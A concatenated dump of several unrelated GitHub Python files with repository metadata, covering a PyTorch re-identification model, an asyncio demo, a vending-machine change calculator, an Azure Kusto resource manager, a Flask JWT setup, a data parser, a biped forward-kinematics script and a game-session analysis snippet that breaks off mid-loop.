'__main__':\n 
unittest.main()\n","repo_name":"afsaneh92/dr_autol","sub_path":"test_cases/amish/register_users.py","file_name":"register_users.py","file_ext":"py","file_size_in_byte":11078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36336064696","text":"import torch\n\nfrom torch import nn\nfrom .component import Encoder, MappingNetwork, MemoryBank\n\n\n\nclass DIMNModel(nn.Module):\n \"\"\"\n This is Domain-Invariant-Mapping-Network model.\n \"\"\"\n def __init__(self, cls_size, params):\n super().__init__()\n\n feature_dim = params[\"feature_dim\"]\n self.encoder = Encoder(params=params[\"encoder\"])\n self.mapping_network = MappingNetwork(in_dim=feature_dim)\n self.memory_bank = MemoryBank(cls_size=cls_size, feature_dim=feature_dim, params=params[\"memory_bank\"])\n self.classifier = nn.Linear(feature_dim, cls_size, bias=False)\n\n\n def forward(self, x_probe, x_gallery, cls_):\n \"\"\"\n Args:\n \n Return:\n \n \"\"\"\n x = torch.cat((x_probe, x_gallery), dim=0)\n features = self.encoder(x)\n features_probe, features_gallery = features[:x_probe.size(0)], features[x_probe.size(0):]\n pred_cls_weights = self.mapping_network(features_gallery)\n selected_cls_weights, tmp_memory = self.memory_bank(pred_cls_weights, cls_)\n logits_classifier = self.classifier(features_probe)\n logits_mapping_network = torch.bmm(tmp_memory, features_probe.unsqueeze(2)).squeeze(2) # (B, C, 1)\n\n return features_probe, logits_classifier, logits_mapping_network, pred_cls_weights, selected_cls_weights, tmp_memory\n\n\n def inference_gallery(self, x, cls_):\n \"\"\"\n Args:\n\n Return:\n\n \"\"\"\n features = self.encoder.inference(x)\n pred_cls_weights = self.mapping_network.inference(features)\n self.memory_bank.inference(pred_cls_weights, cls_)\n\n\n def inference_probe(self, x):\n \"\"\"\n Args:\n\n Return:\n\n \"\"\"\n features = self.encoder.inference(x)\n pred_logits = torch.bmm(self.memory_bank.memory.repeat(x.size(0), 1, 1), features.unsqueeze(2)).squeeze(2) # (B, C, 1)\n\n return pred_logits \n","repo_name":"JackInTaiwan/ReID-DIMN","sub_path":"model/DIMNModel.py","file_name":"DIMNModel.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38452804177","text":"# coding=utf-8\nimport asyncio\nimport time\n\n\nasync def main():\n print(f'{time.ctime()} Hello!')\n await asyncio.sleep(1.0)\n print(f'{time.ctime()} Goodbye!')\n\n\ndef blocking():\n # 此调用是会 block 主线程,阻止 loop 继续运行下去,因此不能让此函数作为 coroutine。\n # 解决方法是让它执行于一个 executor.\n time.sleep(0.5)\n print(f'{time.ctime()} Hello from a thread!')\n\n\nloop = asyncio.get_event_loop()\ntask = loop.create_task(main())\n\n# 此函数仅仅发起一个 schedule,并不真正执行,直到 run_until_complete;返回类型为 Future\nloop.run_in_executor(None, blocking)\nloop.run_until_complete(task)\n\n# pending 不包含 blocking future,只关心 task。\npending = asyncio.all_tasks(loop=loop)\nfor task in pending:\n task.cancel()\ngroup = asyncio.gather(*pending, return_exceptions=True)\nloop.run_until_complete(group)\nloop.close()\n","repo_name":"anderscui/Programming","sub_path":"py3/concurrency/asyncio_book/ex3_3.py","file_name":"ex3_3.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6142466266","text":"\"\"\"\n# 自動販売機のおつり計算プログラム\n\n[条件]\n* cencelと入力されたとき、おつりを計算して処理を終了する\n* 10,000円を超える金額が入力されたとき、再度投入金額を問う\n* 投入金額では何も買えないとき、再度投入金額を問う\n* 1の位が0以外の場合には再度投入金額を問う\n* 
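[Editor's note] The asyncio record above (ex3_3.py) notes in its Chinese comments that `time.sleep` in `blocking()` would stall the event loop if called from a coroutine, so it is pushed to an executor, and that `run_in_executor` only schedules the call, returning a Future. A modern equivalent that awaits the executor future instead of hand-managing the loop, gather, and close:

```python
import asyncio
import time

def blocking():
    # time.sleep would stall the event loop if a coroutine called it directly.
    time.sleep(0.5)
    print(f"{time.ctime()} Hello from a thread!")

async def main():
    print(f"{time.ctime()} Hello!")
    loop = asyncio.get_running_loop()
    # Runs blocking() on the default thread-pool executor and awaits it,
    # so the loop keeps servicing other tasks in the meantime.
    await loop.run_in_executor(None, blocking)
    await asyncio.sleep(1.0)
    print(f"{time.ctime()} Goodbye!")

asyncio.run(main())   # replaces the manual loop/gather/close dance in the record
```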
残金がちょうど0の場合にはメッセージを出力することなく終了する\n* 残金がある場合Y/Nの入力に対応した処理を返す\n* おつりは5000円・2000円・1000円・500円・100円・50円・10円の大きい順に割り当てて返却する\n\n\n\"\"\"\n\ndef calc_vend_change(item_price):\n '''\n \n * 機能 : 自販機のおつりを計算する\n * 入力 : 商品とその値段(dict)\n * 出力 : None\n * 内部関数 : \n 1. _validate_input() : バリデーション\n 2. _purchase() : 商品の購入処理\n 3. _calc_change : おつりの計算\n \n ''' \n min_val = min(list(item_price.values()))\n def _validate_input(money,min_price=min_val):\n '''\n * 機能 : 投入金額のバリデーションを行う。\n * 入力 : \n 1. money : 投入金額 (int)\n 2. min_price : 商品の最安値 (int)\n * 出力 : 投入金額 (int)\n * 補足 : 再起呼び出し\n \n '''\n # 条件1 : 投入金額が10000円以下\n if money > 10000:\n OVER_MONEY_TEXT = \"10,000円を超える金額は投入できません。再度投入金額を入力してください\"\n new_money = int(input(OVER_MONEY_TEXT))\n _validate_input(new_money)\n \n # 条件2 : 投入金額が商品の最低金額以上\n if money < min_price:\n not_enough_text = f\"{money}円では購入できる商品がありません。再度投入金額を入力してください\"\n new_money = int(input(not_enough_text))\n _validate_input(new_money)\n \n # 条件3 : 投入金額の1の位が0以外\n if str(money)[-1] != \"0\":\n INVALID_TEXT = \"1円玉、5円玉は使用できません。再度投入金額を入力してください\"\n new_money = int(input(INVALID_TEXT))\n _validate_input(new_money)\n\n return money\n \n def _purchase(change, item_price=item_price, min_price=min_val):\n '''\n * 機能 : 商品購入部分の処理\n * 入力 : \n 1. change : 残金 (int)\n 2. item_price : 商品とその値段 (dict) \n 3. min_price : 商品の最安値 (int)\n * 出力 : None or 残金(int)\n * 補足 : 再帰呼び出し\n \n '''\n ASK_PURCHASE_TEXT = \"何を購入しますか(商品名/cancel)\"\n item_name = input(ASK_PURCHASE_TEXT) \n \n # cancelが入力されたとき、残金を返す\n if item_name == \"cancel\" or item_name == \"c\":\n return change\n \n # 残金の計算\n new_change = change - item_price[item_name]\n \n # 残金がちょうど0円のとき\n if new_change == 0:\n return None\n \n # 残金が最安値より小さいとき\n if new_change < min_price:\n return new_change\n \n # 残金の表示\n change_text = f\"残金:{new_change}円\"\n print(change_text)\n \n # 購入を継続するか。\n # Yなら再帰呼び出し。Nなら残金を返す。 それ以外なら再度質問をする。\n flag = True\n while flag:\n \n IS_CONTINUE_TEXT = \"続けて購入しますか(Y/N)\"\n is_continue = input(IS_CONTINUE_TEXT)\n \n # 購入を継続するとき、再帰呼び出し\n if is_continue == 'Y' or is_continue == \"y\":\n flag = False\n _purchase(new_change)\n # 継続しないとき、残金を返す\n elif is_continue == 'N' or is_continue == \"n\":\n flag = False\n return new_change\n else:\n pass \n\n def _calc_change(change):\n '''\n * 機能 : 残金からおつりを計算する\n * 入力 : \n 1. 
change : 残金 (int)\n * 出力 : None \n \n ''' \n print(\"おつり\")\n \n # おつりの構成要素\n jpy = (5000, 2000, 1000, 500, 100, 50, 10)\n \n # 残金からおつりを計算してchange_listに格納\n change_list = []\n for i in jpy:\n if change >= i :\n num = change // i\n change_list.append((i, num))\n change -= i * num\n \n \n # おつりの出力\n for pay in change_list:\n if len(str(pay[0])) >= 4:\n print(f\"{pay[0]}円札:{pay[1]}枚\")\n else:\n print(f\"{pay[0]}円玉:{pay[1]}枚\")\n \n \n # 商品とその値段を出力\n for k, v in item_price.items():\n print(f\"{k} : {v}円\")\n \n # 初回の金額の受け取り\n INPUT_TEXT = \"投入金額を入力してください\"\n money = int(input(INPUT_TEXT))\n # 投入金額のバリデーション\n is_valid_money = _validate_input(money, min_val)\n # 金額に応じた購入処理\n change = _purchase(is_valid_money)\n \n # おつりがない場合は何も表示せず終了\n if change is None:\n return \n else:\n # おつりの計算\n _calc_change(change) \n \nif __name__ == \"__main__\":\n item_price_dict = {\n \"お茶\" : 110,\n \"コーヒー\" : 100,\n \"ソーダ\" : 160,\n \"コーンポタージュ\" : 130,\n }\n calc_vend_change(item_price_dict)","repo_name":"makinokoudai/python_teamB_2023518","sub_path":"uehata/vendcalc.py","file_name":"vendcalc.py","file_ext":"py","file_size_in_byte":5868,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"449339600","text":"from datetime import datetime, timedelta\nfrom typing import List, Dict\nfrom urllib.parse import urlparse\n\nfrom tenacity import retry_if_exception_type, stop_after_attempt, Retrying, wait_random_exponential\n\nfrom azure.kusto.data import KustoClient\nfrom azure.kusto.data._models import KustoResultTable\nfrom azure.kusto.data._telemetry import MonitoredActivity, Span\nfrom azure.kusto.data.exceptions import KustoThrottlingError\nfrom azure.kusto.ingest._storage_account_set import _RankedStorageAccountSet\n\n_SHOW_VERSION = \".show version\"\n_SERVICE_TYPE_COLUMN_NAME = \"ServiceType\"\n\n\nclass _ResourceUri:\n def __init__(self, url: str):\n self.url = url\n self.parsed = urlparse(url)\n self.storage_account_name = self.parsed.netloc.split(\".\", 1)[0]\n self.object_name = self.parsed.path.lstrip(\"/\")\n\n @property\n def account_uri(self) -> str:\n return f\"{self.parsed.scheme}://{self.parsed.netloc}/?{self.parsed.query}\"\n\n def __str__(self):\n return self.url\n\n\nclass _IngestClientResources:\n def __init__(\n self,\n secured_ready_for_aggregation_queues: List[_ResourceUri] = None,\n failed_ingestions_queues: List[_ResourceUri] = None,\n successful_ingestions_queues: List[_ResourceUri] = None,\n containers: List[_ResourceUri] = None,\n status_tables: List[_ResourceUri] = None,\n ):\n self.secured_ready_for_aggregation_queues = secured_ready_for_aggregation_queues\n self.failed_ingestions_queues = failed_ingestions_queues\n self.successful_ingestions_queues = successful_ingestions_queues\n self.containers = containers\n self.status_tables = status_tables\n\n def is_applicable(self):\n resources = [\n self.secured_ready_for_aggregation_queues,\n self.failed_ingestions_queues,\n self.failed_ingestions_queues,\n self.containers,\n self.status_tables,\n ]\n return all(resources)\n\n\nclass _ResourceManager:\n def __init__(self, kusto_client: KustoClient):\n self._kusto_client = kusto_client\n self._refresh_period = timedelta(hours=1)\n\n self._ingest_client_resources = None\n self._ingest_client_resources_last_update = None\n self._ranked_storage_account_set = _RankedStorageAccountSet()\n\n self._authorization_context = None\n self._authorization_context_last_update = None\n\n self.__set_throttling_settings()\n\n def close(self):\n 
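# Close the wrapped KustoClient, releasing its underlying connections.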
self._kusto_client.close()\n\n def __set_throttling_settings(self, num_of_attempts: int = 4, max_seconds_per_retry: float = 30):\n self._retryer = Retrying(\n wait=wait_random_exponential(max=max_seconds_per_retry),\n retry=retry_if_exception_type(KustoThrottlingError),\n stop=stop_after_attempt(num_of_attempts),\n reraise=True,\n )\n\n def _refresh_ingest_client_resources(self):\n if (\n not self._ingest_client_resources\n or (self._ingest_client_resources_last_update + self._refresh_period) <= datetime.utcnow()\n or not self._ingest_client_resources.is_applicable()\n ):\n self._ingest_client_resources = self._get_ingest_client_resources_from_service()\n self._ingest_client_resources_last_update = datetime.utcnow()\n self._populate_ranked_storage_account_set()\n\n def _get_resource_by_name(self, table: KustoResultTable, resource_name: str):\n return [_ResourceUri(row[\"StorageRoot\"]) for row in table if row[\"ResourceTypeName\"] == resource_name]\n\n def _get_ingest_client_resources_from_service(self):\n # trace all calls to get ingestion resources\n def invoker():\n return MonitoredActivity.invoke(\n lambda: self._kusto_client.execute(\"NetDefaultDB\", \".get ingestion resources\"),\n name_of_span=\"_ResourceManager.get_ingestion_resources\",\n tracing_attributes=Span.create_cluster_attributes(self._kusto_client._kusto_cluster),\n )\n\n result = self._retryer(invoker)\n table = result.primary_results[0]\n\n secured_ready_for_aggregation_queues = self._get_resource_by_name(table, \"SecuredReadyForAggregationQueue\")\n failed_ingestions_queues = self._get_resource_by_name(table, \"FailedIngestionsQueue\")\n successful_ingestions_queues = self._get_resource_by_name(table, \"SuccessfulIngestionsQueue\")\n containers = self._get_resource_by_name(table, \"TempStorage\")\n status_tables = self._get_resource_by_name(table, \"IngestionsStatusTable\")\n\n return _IngestClientResources(secured_ready_for_aggregation_queues, failed_ingestions_queues, successful_ingestions_queues, containers, status_tables)\n\n def _refresh_authorization_context(self):\n if (\n not self._authorization_context\n or self._authorization_context.isspace()\n or (self._authorization_context_last_update + self._refresh_period) <= datetime.utcnow()\n ):\n self._authorization_context = self._get_authorization_context_from_service()\n self._authorization_context_last_update = datetime.utcnow()\n\n def _get_authorization_context_from_service(self):\n # trace all calls to get identity token\n def invoker():\n return MonitoredActivity.invoke(\n lambda: self._kusto_client.execute(\"NetDefaultDB\", \".get kusto identity token\"),\n name_of_span=\"_ResourceManager.get_identity_token\",\n tracing_attributes=Span.create_cluster_attributes(self._kusto_client._kusto_cluster),\n )\n\n result = self._retryer(invoker)\n return result.primary_results[0][0][\"AuthorizationContext\"]\n\n def _populate_ranked_storage_account_set(self):\n for resource in self._ingest_client_resources.containers:\n self._ranked_storage_account_set.add_storage_account(resource.storage_account_name)\n for resource in self._ingest_client_resources.secured_ready_for_aggregation_queues:\n self._ranked_storage_account_set.add_storage_account(resource.storage_account_name)\n\n def _group_resources_by_storage_account(self, resources: List[_ResourceUri]) -> Dict[str, List[_ResourceUri]]:\n resources_by_storage_account = {}\n for resource in resources:\n if resource.storage_account_name not in resources_by_storage_account:\n 
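# First resource seen for this storage account: create its bucket before appending.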
resources_by_storage_account[resource.storage_account_name] = list()\n resources_by_storage_account[resource.storage_account_name].append(resource)\n\n return resources_by_storage_account\n\n def _get_shuffled_and_ranked_resources(self, resources: List[_ResourceUri]) -> List[List[_ResourceUri]]:\n resources_by_storage_account = self._group_resources_by_storage_account(resources)\n ranked_storage_accounts = self._ranked_storage_account_set.get_ranked_shuffled_accounts()\n\n # sort resources by storage account rank\n ranked_resources = list()\n for storage_account in ranked_storage_accounts:\n if storage_account.account_name in resources_by_storage_account.keys():\n ranked_resources.append(resources_by_storage_account[storage_account.account_name])\n\n return ranked_resources\n\n def _shuffle_and_select_with_round_robin(self, resources: List[_ResourceUri]) -> List[_ResourceUri]:\n # get list of resources sorted by storage account rank\n rank_shuffled_resources_list = self._get_shuffled_and_ranked_resources(resources)\n\n # select resources with non-repeating round robin and flatten the list\n result = []\n while True:\n if all(not lst for lst in rank_shuffled_resources_list):\n break\n\n for lst in rank_shuffled_resources_list:\n if lst:\n result.append(lst.pop(0))\n\n return result\n\n def get_ingestion_queues(self) -> List[_ResourceUri]:\n self._refresh_ingest_client_resources()\n return self._shuffle_and_select_with_round_robin(self._ingest_client_resources.secured_ready_for_aggregation_queues)\n\n def get_failed_ingestions_queues(self) -> List[_ResourceUri]:\n self._refresh_ingest_client_resources()\n return self._ingest_client_resources.failed_ingestions_queues\n\n def get_successful_ingestions_queues(self) -> List[_ResourceUri]:\n self._refresh_ingest_client_resources()\n return self._ingest_client_resources.successful_ingestions_queues\n\n def get_containers(self) -> List[_ResourceUri]:\n self._refresh_ingest_client_resources()\n return self._shuffle_and_select_with_round_robin(self._ingest_client_resources.containers)\n\n def get_ingestions_status_tables(self) -> List[_ResourceUri]:\n self._refresh_ingest_client_resources()\n return self._ingest_client_resources.status_tables\n\n def get_authorization_context(self):\n self._refresh_authorization_context()\n return self._authorization_context\n\n def retrieve_service_type(self):\n try:\n command_result = self._kusto_client.execute(\"NetDefaultDB\", _SHOW_VERSION)\n return command_result.primary_results[0][0][_SERVICE_TYPE_COLUMN_NAME]\n except (TypeError, KeyError):\n return \"\"\n\n def set_proxy(self, proxy_url: str):\n self._kusto_client.set_proxy(proxy_url)\n\n def report_resource_usage_result(self, storage_account_name: str, success_status: bool):\n self._ranked_storage_account_set.add_account_result(storage_account_name, success_status)\n","repo_name":"Azure/azure-kusto-python","sub_path":"azure-kusto-ingest/azure/kusto/ingest/_resource_manager.py","file_name":"_resource_manager.py","file_ext":"py","file_size_in_byte":9588,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"72"} +{"seq_id":"31597169528","text":"import typing as t\n\nimport redis\nfrom flask import Flask, session\nfrom flask_babel import lazy_gettext as _\nfrom flask_jwt_extended import JWTManager as _JWTManager\n\nfrom bwm.component.base import Component\nfrom bwm.type import Data\n\n\nclass JWTComponent(Component):\n def register(self):\n from bwm.model import account\n\n jwt.init_app(self._app)\n\n 
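# flask-jwt-extended wires identity handling through the callbacks registered
# below: `user_identity_loader` serializes a User into the token's "sub" claim,
# `user_lookup_loader` resolves that claim back to a User on each request,
# `token_in_blocklist_loader` checks Redis for revoked token ids (jti), and
# `token_verification_loader` rejects tokens whose user cannot be found.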
@jwt.user_identity_loader\n def user_identity_lookup(user: account.User):\n return str(user.union_id)\n\n @jwt.user_lookup_loader\n def user_lookup_callback(\n jwt_header: dict, jwt_data: dict\n ) -> t.Optional[account.User]:\n return _get_login_user(jwt_data)\n\n @jwt.token_in_blocklist_loader\n def check_if_token_is_revoked(jwt_header: dict, jwt_data: dict):\n jti = jwt_data[\"jti\"]\n revoked_key = self._app.config[\"JWT_REVOKED_KEY\"].format(jti)\n token_in_redis = jwt.redis_blocklist.get(revoked_key)\n return token_in_redis is not None\n\n @jwt.token_verification_loader\n def token_verification(jwt_header: dict, jwt_data: dict):\n return _get_login_user(jwt_data) is not None\n\n def _get_login_user(jwt_data: dict):\n union_id = jwt_data[\"sub\"]\n user_data: Data = session.get(union_id)\n if user_data is None:\n user: t.Optional[account.User] = account.User.query.filter_by(\n union_id=union_id, is_delete=False\n ).first()\n if user:\n session[union_id] = user.to_dict()\n else:\n user = account.User(**user_data)\n return user\n\n\nclass JWTManager(_JWTManager):\n def __init__(self, app: Flask = None) -> None:\n super().__init__(app)\n self._redis_blocklist: t.Optional[redis.StrictRedis] = None\n\n def init_app(self, app: Flask) -> None:\n super().init_app(app)\n\n redis_host = app.config[\"JWT_BLACKLIST_REDIS_HOST\"]\n redis_port = app.config[\"JWT_BLACKLIST_REDIS_PORT\"]\n redis_db = app.config[\"JWT_BLACKLIST_REDIS_DB\"]\n self._redis_blocklist = redis.StrictRedis(\n host=redis_host, port=redis_port, db=redis_db, decode_responses=True\n )\n\n @property\n def redis_blocklist(self):\n if not self._redis_blocklist:\n raise RuntimeError(_(\"redis_blocklist 未初始化\"))\n return self._redis_blocklist\n\n\njwt = JWTManager()\n","repo_name":"terrluo/bwm","sub_path":"bwm/component/jwt.py","file_name":"jwt.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9626599909","text":"import numpy as np\n\ndef parse_data(filename):\n xs = []\n ys = []\n with open(filename) as f:\n for line in f.readlines():\n line = line[:-1].replace(',', '')\n line = [int(x) for x in line.replace('-', '')]\n x = line[::2]\n y = line[1::2]\n xs.append(x)\n ys.append(y)\n return xs, ys\n\ndef parse_and_preprocess_data(filename):\n \"\"\"\n Parse data and map each point form the lattice to [0..99]\n using fixed permutation\n \"\"\"\n np.random.seed(1337)\n permutation = np.random.permutation(100)\n data = []\n with open(filename) as f:\n for line in f.readlines():\n line = line[:-1].replace(',', '')\n line = [int(x) for x in line.replace('-', '')]\n xs = line[::2]\n ys = line[1::2]\n indices = [x + y * 10 for x, y in zip(xs,ys)]\n data.append([permutation[index] for index in indices])\n return data\n\ndef parse_labels(filename):\n labels = []\n with open(filename) as f:\n for line in f.readlines():\n labels.append(int(line[:-1]))\n\n return labels","repo_name":"probably-nothing1/SequenceClassification","sub_path":"src/dataset/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21912050490","text":"#forward kinematics functions\n\nfrom vpython import *\nimport numpy as np\n# Uses Kajita matlab script as basis\n#SetupBiped sets parameters of each joint. 
Child and sister empty as sister only relevant for top hip joint, and child not relevant for foot.\n# Number is joint number, a is joint axis, q is joint velocity\nclass SetupBiped:\n def __init__(self, number, a, q, pos, rm, b = None, parent = None):\n self.number = number\n self.child = []\n self.sister = None\n self.a = a\n self.q = q\n self.pos=pos\n self.parent = parent\n self.b = b\n self.rm = rm #np.array([[1, 0, 0],[0,1,0],[0,0,1]])\n \n if self.parent is not None:\n self.parent.child.append(self)\n #self.tm_0_i = np.array([[1,0,0,self.pos.x-self.parent.pos.x],[0,1,0,self.pos.y-self.parent.pos.y],[0, 0, 1, self.pos.z-self.parent.pos.z],[0,0,0,1]])\n #if self.parent is None:\n #condition here\n\n \n def ForwardKinematics(self, joint_angle):\n # cant do dot product on 3x3 vector, so seperate operations, make into vector parent_RM_mult_b that is 1x3\n # equivalent to rm * b\n parent_rm_mul_b= vector(dot(self.parent.rm[0], self.b), dot(self.parent.rm[1], self.b), dot(self.parent.rm[2], self.b))\n self.pos = parent_rm_mul_b + self.parent.pos\n\n #Rodrigues formula\n eye = [[1,0,0],[0,1,0],[0,0,1]] #for rodrigues\n wedge = np.array([[0, -self.a.z, self.a.y], [self.a.z, 0, -self.a.x], [-self.a.y, self.a.x, 0]])#3x3\n squared = wedge.dot(wedge)\n e = np.array(eye + wedge*sin(joint_angle) + squared*(1-cos(joint_angle))) #R = eye(3) + w_wedge * sin(th) + w_wedge^2 * (1-cos(th));\n \n \n #convert parent's rotation matrix (vector) to array so that dot product works\n rm_to_array = np.array([[self.parent.rm[0].x, self.parent.rm[0].y, self.parent.rm[0].z],[self.parent.rm[1].x, self.parent.rm[1].y,self.parent.rm[1].z],[ self.parent.rm[2].x, self.parent.rm[2].y, self.parent.rm[2].z]])\n self.rm =np.dot(rm_to_array, e)\n\n #convert back to make into array of vectors as used to update position, a vector\n row_1 = vector(self.rm[0,0], self.rm[0,1], self.rm[0,2])\n row_2 = vector(self.rm[1,0], self.rm[1,1], self.rm[1,2])\n row_3 = vector(self.rm[2,0], self.rm[2,1], self.rm[2,2])\n self.rm = [row_1,row_2,row_3]\n \n self.draw()\n\n def draw(self):\n joint_rad = 4\n #toggle visibility??\n joint_drawing = sphere(pos=self.pos, radius=joint_rad)\n if self.parent is not None:\n leg_drawing = curve([self.pos, self.parent.pos], radius = 1.5)\n\n \"\"\"\n def CalcVWerr(self, target):\n #calculate error in position\n perr = target.pos - self.pos\n #convert to matrices\n self_rm_array = np.array([[self.rm[0].x, self.rm[0].y, self.rm[0].z],[self.rm[1].x, self.rm[1].y,self.rm[1].z],[self.rm[2].x, self.rm[2].y, self.rm[2].z]])\n target_rm_array = np.array([[target.rm[0].x, target.rm[0].y, target.rm[0].z],[target.rm[1].x, target.rm[1].y,target.rm[1].z],[target.rm[2].x, target.rm[2].y, target.rm[2].z]])\n Rerr = self_rm_array.transpose * target_rm_array\n\n #rot2omega -Transform rotation matrix into the corresponding angular velocity vector T.Sugihara, Humanoids 2009\n el = np.array([[Rerr[2,1]-Rerr[1,2]], [Rerr[0,2] - Rerr[2,0]], [Rerr[1,0] - Rerr[0,1]]])\n norm_el = norm(el)\n if norm_el > 2^(-52):\n w = atan2(norm_el, (np.trace(Rerr)-1)/norm_el * el)\n elif Rerr[0,0]> 0 and Rerr[1,1] >0 and Rerr[2,2] > 0:\n w = np.array[0,0,0]\n else:\n w = pi/2 * np.array([[Rerr[0,0] +1], [Rerr[1,1] +1], [Rerr[2,2]+1]])\n\n #use angular velcoity vector to calculate error in ?angle\n werr = self_rm_array * w\n err = np.array([[perr],[werr]])\n #return both errors\n return err\n\n def CalcJacobian(self):\n J = np.zeros(6,6)\n joint_array = [j1, j2, j3, j4, j5, j6, j7]\n \n for n in range(2,7):\n joint = joint_array(n)\n #a 
=joint.rm * joint.a\n a = vector(dot(joint.rm[0], joint.a), dot(joint.rm[1], joint.a), dot(joint.rm[2], joint.a))\n #need array to append into Jacobian\n a_to_array = np.array([a.x, a.y, a.z])\n cross_product = cross(a, j7.pos - joint.pos)\n cross_product_array = np.array([cross_product.x, cross_product.y, cross_product.z])\n J[:,n-1] = [cross_product_array, a_to_array]\n\n\n def InverseKinematics(self, target):\n #finds links from self through to foot\n #while self.number > route.len():\n # route.append(route.len() + 1)\n\n #update all joints \n #what to do with joint 1\n joint_array = [j2, j3, j4, j5, j6, j7]\n for joint in joint_array:\n joint.ForwardKinematics(0)\n \n #calculate errors\n err = self.CalcVWerr(target)\n\n #for loop to break at error\n for n in range(1,10): #10 iterations\n if norm(err) < 10^(-6):\n break\n\n #calculate Jacobian\n self.CalcJacobian()\n\n #calc adjustments\n\n #addition of q + dq\n\n #update ForwardKinematics again for all joints\n\n #calc error again until satisfies \n \n\n \"\"\"\n# setting a, joint axis vector (roll, pitch, yaw)\nUX = vector(1,0,0)\nUY = vector(0,1,0)\nUZ = vector(0,0,1)\n\n\"\"\"\"\nj1.pos = vector(67, 86, 0)\nj2.pos = vector(50, 86, 0)\nj3.pos = vector(50, 78, 0)\nj4.pos = vector(50, 78, 0)\nj5.pos = vector(50, 44, 0)\nj6.pos = vector(50, 19, 0)\nj7.pos = vector(50, 0, 0)\n\nj8.pos = vector(76, 86, 0)\nj9.pos = vector(76, 78, 0)\nj10.pos = vector(84, 78, 0)\nj11.pos = vector(84, 44, 0)\nj12.pos = vector(84, 19, 0)\nj13.pos = vector(84, 0, 0)\n\"\"\"\nex = vector(1,0,0) #vector(1,0,0)\ney = vector(0,1,0) #vector(0,0,1)\nez = vector(0,0,1) #vector(0,-1,0)\neye_rm = [ex, ey, ez] #x, y, z\n\n#joint 1 is body, increasing joint no = down right leg, j7 is foot\n#Axis as defined in VPython setup\n# number, a, q, pos, rm, b = None, parent = None):\nj1 = SetupBiped(1, UY, 0, vector(67, 86, 0), eye_rm )\nj2 = SetupBiped(2, UY, 0, vector(58, 86, 0), eye_rm, vector(-9,0,0), j1)\nj3 = SetupBiped(3, UZ, 0, vector(58, 78, 0), eye_rm, vector(0, 78-86,0), j2)\nj4 = SetupBiped(4, UX, 0, vector(50, 78, 0), eye_rm, vector(50-58,0,0), j3)\nj5 = SetupBiped(5, UX, 0, vector(50, 44, 0), eye_rm, vector(0,44-78,0), j4)\nj6 = SetupBiped(6, UX, 0, vector(50, 19, 0), eye_rm, vector(0, 19-44,0), j5)\nj7 = SetupBiped(7, UZ, 0, vector(50, 0, 0), eye_rm, vector(0, -19,0), j6)\n\n#Left leg going down, j13 is foot\nj8 = SetupBiped(8, UY, 0, vector(76, 86, 0), eye_rm, vector(76-67,0,0),j1)\nj9 = SetupBiped(9, UZ, 0, vector(76, 78, 0), eye_rm, vector(0,78-86,0),j8)\nj10 = SetupBiped(10, UX, 0, vector(84, 78, 0), eye_rm, vector(84-76,0,0), j9)\nj11 = SetupBiped(11, UX, 0, vector(84, 44, 0), eye_rm, vector(0,44-78,0), j10)\nj12 = SetupBiped(12, UX, 0, vector(84, 19, 0), eye_rm, vector(0,19-44,0),j11)\nj13 = SetupBiped(13, UZ, 0, vector(84, 0, 0), eye_rm, vector(0,-19,0), j12)\n\n#** two children of body: left hip, right hip. 
Instead of one child and one sister for joint 2**\nj1.child = [j2, j8] \n\n#j2.sister = j8\nj2.child = j3\n#right leg\nj3.child = j4\nj4.child = j5\nj5.child = j6\nj6.child = j7\n#left leg\nj8.child = j9\nj9.child = j10\nj10.child = j11\nj12.child = j13\n\nj1.draw()\nj2.draw()\nj3.draw()\nj4.draw()\nj5.draw()\nj6.draw()\nj7.draw()\nj8.draw()\nj9.draw()\nj10.draw()\nj11.draw()\nj12.draw()\nj13.draw()\n","repo_name":"Abi-Humanoid/Inverse_Kinematics","sub_path":"Laura/Kinematics/SetupJoints_FK_ViaKajitaMethod.py","file_name":"SetupJoints_FK_ViaKajitaMethod.py","file_ext":"py","file_size_in_byte":7599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6900594255","text":"from models import (UserOrm, UserModel, UserWithHashModel)\n\ndef get_user_txn(session, username):\n if username is not None:\n user = session.query(UserOrm).filter(\n UserOrm.username == username).first()\n \n if(user is None):\n return False\n \n return UserWithHashModel.from_orm(user)\n","repo_name":"sdairs/vue3-fastapi-oath2-jwt-demo","sub_path":"backend/transactions.py","file_name":"transactions.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"18749874876","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\nimport joblib\nfrom utils import normalize_MPU9250_data, split_df\n# from ChairAnalyzerOld import ChairAnalyser\nfrom datetime import datetime\n\nplt.interactive(True)\npd.options.display.max_columns = 15\npic_prefix = 'pic/'\ndata_path = 'Anonimised Data/Data'\nprocessed_data_path = 'data/players_data_processed'\n\n# data_dict = joblib.load('data/data_dict')\nsessions_dict = joblib.load('data/sessions_dict')\ngamedata_dict = joblib.load('data/gamedata_dict')\n\ncommon_keys = set(sessions_dict.keys()) & set(gamedata_dict.keys())\n\ngame_events_features_dict = {}\n\nfor session_id in common_keys:\n if 'schairlog' not in sessions_dict[session_id]:\n continue\n\n schairlog = sessions_dict[session_id]['schairlog'].copy()\n times_is_killed = gamedata_dict[session_id]['times_is_killed']\n times_kills = gamedata_dict[session_id]['times_kills']\n\n # schairlog['time'] = pd.to_datetime(schairlog['time']).apply(lambda x: x.timestamp())\n # times_is_killed = [x.timestamp() for x in pd.to_datetime(times_is_killed)]\n # times_kills = [x.timestamp() for x in 